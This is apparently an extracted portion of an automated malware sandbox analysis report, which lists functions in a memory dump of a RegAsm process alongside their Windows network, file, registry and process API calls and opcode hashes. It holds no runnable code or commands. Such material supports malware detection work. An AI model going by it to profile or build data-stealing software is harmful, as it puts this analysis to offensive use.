                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                            • Opcode ID: c54d81fddacd2cbff03315d3c59634262e4f9b4b6c041cf71a0d5c63e95615ea
                                                                                                                                                                                                                                                            • Instruction ID: d4df36f3ae977bccc1e53b7daa7ccb0c4da166d2c3dacc872dafca06065db198
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c54d81fddacd2cbff03315d3c59634262e4f9b4b6c041cf71a0d5c63e95615ea
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8F06276B447099BC700EF69DC80A1A77E9EF89609718803CA46183362DA70AD1ACB58
                                                                                                                                                                                                                                                            Function 0040785A Relevance: 1.5, APIs: 1, Instructions: 36networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HttpRequestSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 360639707-0
                                                                                                                                                                                                                                                            • Opcode ID: 128fc794dd7df37090889cde7c700cc9ebf5d29e3d1e2b8f998b75ac21f5148c
                                                                                                                                                                                                                                                            • Instruction ID: bf0f034a3dd850cf0cb564b24178683266c6b6b51357b7988c54eadef3e04e74
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 128fc794dd7df37090889cde7c700cc9ebf5d29e3d1e2b8f998b75ac21f5148c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74F0AF766002859BD314DF38EC91FAA73E9EB8E304F058668B615D72D2EA30AD50CB14
                                                                                                                                                                                                                                                            Function 00401124 Relevance: 1.5, APIs: 1, Instructions: 35registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 0040116F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Open
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                                                                                                            • Opcode ID: 3fdf45d8cf678b361a808c94b8cc7572885393971de760a12fde78d5daa8ab18
                                                                                                                                                                                                                                                            • Instruction ID: f3b03884cb52d199f356ad5dd5f3a1ff2906ecf3ed5d74594d059c0442db3dd9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fdf45d8cf678b361a808c94b8cc7572885393971de760a12fde78d5daa8ab18
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07F05EB5304204AFD304EB29EC96E2F76AEEBC629CB09412CF645D7251CAB09D109725
                                                                                                                                                                                                                                                            Function 00409D4A Relevance: 1.5, APIs: 1, Instructions: 35networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • connect.WS2_32(?,?,00000010), ref: 00409D9B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: connect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1959786783-0
                                                                                                                                                                                                                                                            • Opcode ID: a0b9c6951ddee27bfd121741c426206ffc976de5c3bda4e77bf4ae948fd768d7
                                                                                                                                                                                                                                                            • Instruction ID: 1c76ee57f995fb73f56d176aba3e3fe730563ee54a1c86628c8c5cf679eeabc3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0b9c6951ddee27bfd121741c426206ffc976de5c3bda4e77bf4ae948fd768d7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D0014678240300DFD328CF59DD84E1AB3E6AF88304B18882DA5AAC7392C678E804CB19
                                                                                                                                                                                                                                                            Function 0040658C Relevance: 1.5, APIs: 1, Instructions: 34networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 004065D3
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: HttpRequestSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 360639707-0
                                                                                                                                                                                                                                                            • Opcode ID: b5efd7d13abf80949e0d98f68c3f819bcdfda6731efe7baf540d0d921052d973
                                                                                                                                                                                                                                                            • Instruction ID: db716060e8ae9f8fcc5e862a0cebcb454ceb0093ee65c84773531da29eefcbe9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5efd7d13abf80949e0d98f68c3f819bcdfda6731efe7baf540d0d921052d973
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5F0F9B6B01115DFCF08CBA8DC9097EBBB6BF89254718002DA406D33A1CA305C11DB48
                                                                                                                                                                                                                                                            Function 0040BC40 Relevance: 1.5, APIs: 1, Instructions: 32fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                            • Opcode ID: 94c759a8ce41bf2e0de2e2b8980983596a01c6efcb84545c265453e26e10f652
                                                                                                                                                                                                                                                            • Instruction ID: 6670c946d57bb98f83207a2e2a4dd8fc4f459805bc578e4bde3d9dfa9d5bd7d2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 94c759a8ce41bf2e0de2e2b8980983596a01c6efcb84545c265453e26e10f652
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ADF0F631A043058BC304EF2CDD8095577F1FFC5614F44852CE88483262EA30EA56C7C6
                                                                                                                                                                                                                                                            Function 0041E504 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 0041E518
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                                            • Opcode ID: bc003e0033e343d7ba4dec19045f45bd8d3e8025bf33d3d776cd7bc3a0ad43a3
                                                                                                                                                                                                                                                            • Instruction ID: cbd043872ff42a4671465c5ece64a3fa1dab85f27f9690b3f564dbc24f64846f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc003e0033e343d7ba4dec19045f45bd8d3e8025bf33d3d776cd7bc3a0ad43a3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDF03076680302DFC3109FEADC9090677EAEFD5B147654429E155C7261DA78F8528718
                                                                                                                                                                                                                                                            Function 00407A42 Relevance: 1.5, APIs: 1, Instructions: 31networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET ref: 00407A4F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandleInternet
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1081599783-0
                                                                                                                                                                                                                                                            • Opcode ID: f04c3059d13612331f16bb35f90639296bb56c4fb4b1baf07688cfb360f2082a
                                                                                                                                                                                                                                                            • Instruction ID: 88d412fa64d1c6e445ea03cfeab172df5ee83cc834e1a70835b8b2090521133f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f04c3059d13612331f16bb35f90639296bb56c4fb4b1baf07688cfb360f2082a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69F0DA7AA000AA9BCF00DF98FC918DDB764FB853247044025ED1AE3251DA34BE55DBD4
                                                                                                                                                                                                                                                            Function 00428B6F Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00428B8D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                            • Opcode ID: 1cbed7a68a4fd64f4a3c6965399a7e26c25b9176cb7031c005de184faee0bea6
                                                                                                                                                                                                                                                            • Instruction ID: 9528cd4afdda23467e0083a937059f108ced78d3526648939f428abbaa092546
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1cbed7a68a4fd64f4a3c6965399a7e26c25b9176cb7031c005de184faee0bea6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5F0E277E00149AFEF01CB88EC90ADC77B5EB91204F054071E919E3260D739AE4A8F84
                                                                                                                                                                                                                                                            Function 00409CA9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 00409CF5
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: getaddrinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 300660673-0
                                                                                                                                                                                                                                                            • Opcode ID: 9578f0d61e1449aacc03a36e68f72606a615a669d3faf548841a9fdb8cf3b8d6
                                                                                                                                                                                                                                                            • Instruction ID: 05f6202e1bc20cb4b29bb86db7e74d39b969980e396a867aade4093ea41b7757
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9578f0d61e1449aacc03a36e68f72606a615a669d3faf548841a9fdb8cf3b8d6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4DF06DB1A44344DFE710CF64CCC4B9AB7E4FF85308F05C529A858D7202E7B4A9948B51
                                                                                                                                                                                                                                                            Function 00422843 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                            • Opcode ID: 5945a3499541b6383abbb0a70d97a528e2c9057cc4c6911cb941dca9f761e5af
                                                                                                                                                                                                                                                            • Instruction ID: e4ea1631332a28b91d4e6c48b2df1f928bb27cf93cb495e3936d86b248a4f1bc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5945a3499541b6383abbb0a70d97a528e2c9057cc4c6911cb941dca9f761e5af
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 07F0E23A9143008BC704EF7CCC84666B7E4AF8A268F04063CECE0872E2E6309D59C7D6
                                                                                                                                                                                                                                                            Function 00413142 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0041315E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                                                                                                                                            • Opcode ID: 8c1172f1069cd386c8498d50835f691b8d700a6194f4737e5d350dae5d27791d
                                                                                                                                                                                                                                                            • Instruction ID: 23ef3dd95bf6a0164c47cf999acec1c42eb63bf94e27a0aeafc3b0acf90d2c1f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c1172f1069cd386c8498d50835f691b8d700a6194f4737e5d350dae5d27791d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75F0A0BAB405648BCB09D758DCA1ABC37E3ABC9305B080059C905A7751CA786D61DA4D
                                                                                                                                                                                                                                                            Function 0040B98E Relevance: 1.5, APIs: 1, Instructions: 26processCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                                                                                                            • Opcode ID: b8df199aab9badff020bc2b1227722152c72f420ecf84555ae2651d7957e55b5
                                                                                                                                                                                                                                                            • Instruction ID: 8b4a8257022abbb41a3118302225be22bdba0b02c73ba330e27b8c205def3af7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8df199aab9badff020bc2b1227722152c72f420ecf84555ae2651d7957e55b5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8F0F9B5A087018BD70CDF29C9906A9B7F0BF9D304F00C96DA899D3361EA30DA45CF05
                                                                                                                                                                                                                                                            Function 00412EF8 Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00412F23
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1304948518-0
                                                                                                                                                                                                                                                            • Opcode ID: 2954db867639c53f90c80a99d2f2c9786d5699ed2f9d976f1843ad7852b205c3
                                                                                                                                                                                                                                                            • Instruction ID: b7c71d53dac44b228edffe1a05e153bdbe68826ecec0f01bcc8b446e4b1f0614
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2954db867639c53f90c80a99d2f2c9786d5699ed2f9d976f1843ad7852b205c3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AF030BAB001058FD748CB6CDC91B9D73E7EFD8309B184128A405D7365EA71ED56CB44
                                                                                                                                                                                                                                                            Function 0040C871 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C89C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1304948518-0
                                                                                                                                                                                                                                                            • Opcode ID: d14a2ba5cc82fcc1864902cf64a2bea3494f77a9fcd36c36f244b44799870a20
                                                                                                                                                                                                                                                            • Instruction ID: 1daf45191db6c52babe1fe8c8a27866bb4fb13e0f71ca1e9aaeaddf3e781aff4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d14a2ba5cc82fcc1864902cf64a2bea3494f77a9fcd36c36f244b44799870a20
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63E06DBAB412008BC71CFF68ECA4F6A33A5EB96740B08402CA802C33D4DD609911CA4A
                                                                                                                                                                                                                                                            Function 0040A36D Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 0040A398
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: send
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2809346765-0
                                                                                                                                                                                                                                                            • Opcode ID: c86cb437a16923ba70a9f6b55ded9f8956fbf0d8b58b57c2774321bcb1cc0512
                                                                                                                                                                                                                                                            • Instruction ID: f7f0187726c946ab94bd7783febf1ef7e1263ef785280c0f7cc2a8f968373833
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c86cb437a16923ba70a9f6b55ded9f8956fbf0d8b58b57c2774321bcb1cc0512
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AE09275380200DFD750EB6CCC80B2933E5AB88358F040524F225D73E2C638AE518B5A
                                                                                                                                                                                                                                                            Function 004095F3 Relevance: 1.5, APIs: 1, Instructions: 24filenetworkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000FFF,?), ref: 004095AA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                            • Opcode ID: 8ddbed3e19b3c5e16b329f61f458e941262536b44169388930885874bfec931b
                                                                                                                                                                                                                                                            • Instruction ID: 793b8917542ee9cb27708f1ec57fc827c82194574f1446412d7664dbd63c4935
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ddbed3e19b3c5e16b329f61f458e941262536b44169388930885874bfec931b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E0657A348201EFD340CB5DDC84F6AB3E89B88644F180428A00AC3392CA74EC00DB2A
                                                                                                                                                                                                                                                            Function 0041FE65 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Enum
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2928410991-0
                                                                                                                                                                                                                                                            • Opcode ID: 7e85817e22f138c02c453e3c8736ecf73058679fe76b3fc0f0587abf6011d14e
                                                                                                                                                                                                                                                            • Instruction ID: 05a1160b0d36b77b328343130d452bea134fcae93cfb3c47e4085434c63e978c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e85817e22f138c02c453e3c8736ecf73058679fe76b3fc0f0587abf6011d14e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51F08270A183459FDB08DF29C894569B7E1BFC8314F14C92EE89A47354F770A885CB86
                                                                                                                                                                                                                                                            Function 00413263 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00413298
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                            • Opcode ID: 15c4ffbb12baafcaac6dc899ca935e25643eb30cf0bd71265adac321ad7158ee
                                                                                                                                                                                                                                                            • Instruction ID: c6d18ff3661babe7afd2bf8597fec0b91fd64dfa3a206f198322a9390ae50d2e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15c4ffbb12baafcaac6dc899ca935e25643eb30cf0bd71265adac321ad7158ee
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DF01CB6B4010A8BCB05CB58DD91BDC33B5EF58204F140128D909D7261EA31BE158F54
                                                                                                                                                                                                                                                            Function 0042C391 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32 ref: 0042C39D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                            • Opcode ID: 011e9bd8fc71e4e42e049cef734956ce052094584bd460ef50def60e2692713a
                                                                                                                                                                                                                                                            • Instruction ID: 6d828852da939186bf56a3799f9f6520df9f02f76987a01fc32ecadda15bd6d6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 011e9bd8fc71e4e42e049cef734956ce052094584bd460ef50def60e2692713a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAE09276B801049BE315C789EC90F7973A6AFC9300F6940399616C73D2CE74AC05876C
                                                                                                                                                                                                                                                            Function 00409580 Relevance: 1.5, APIs: 1, Instructions: 23filenetworkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000FFF,?), ref: 004095AA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                            • Opcode ID: 0b13a4c9756e6dbc5a3b479240f144414e6dfb9d172209e6f6427846867f8471
                                                                                                                                                                                                                                                            • Instruction ID: 282d77582df1dc03db1effc52c008eafb25d4b73df9bbd85ee4dda3fdaa0c12f
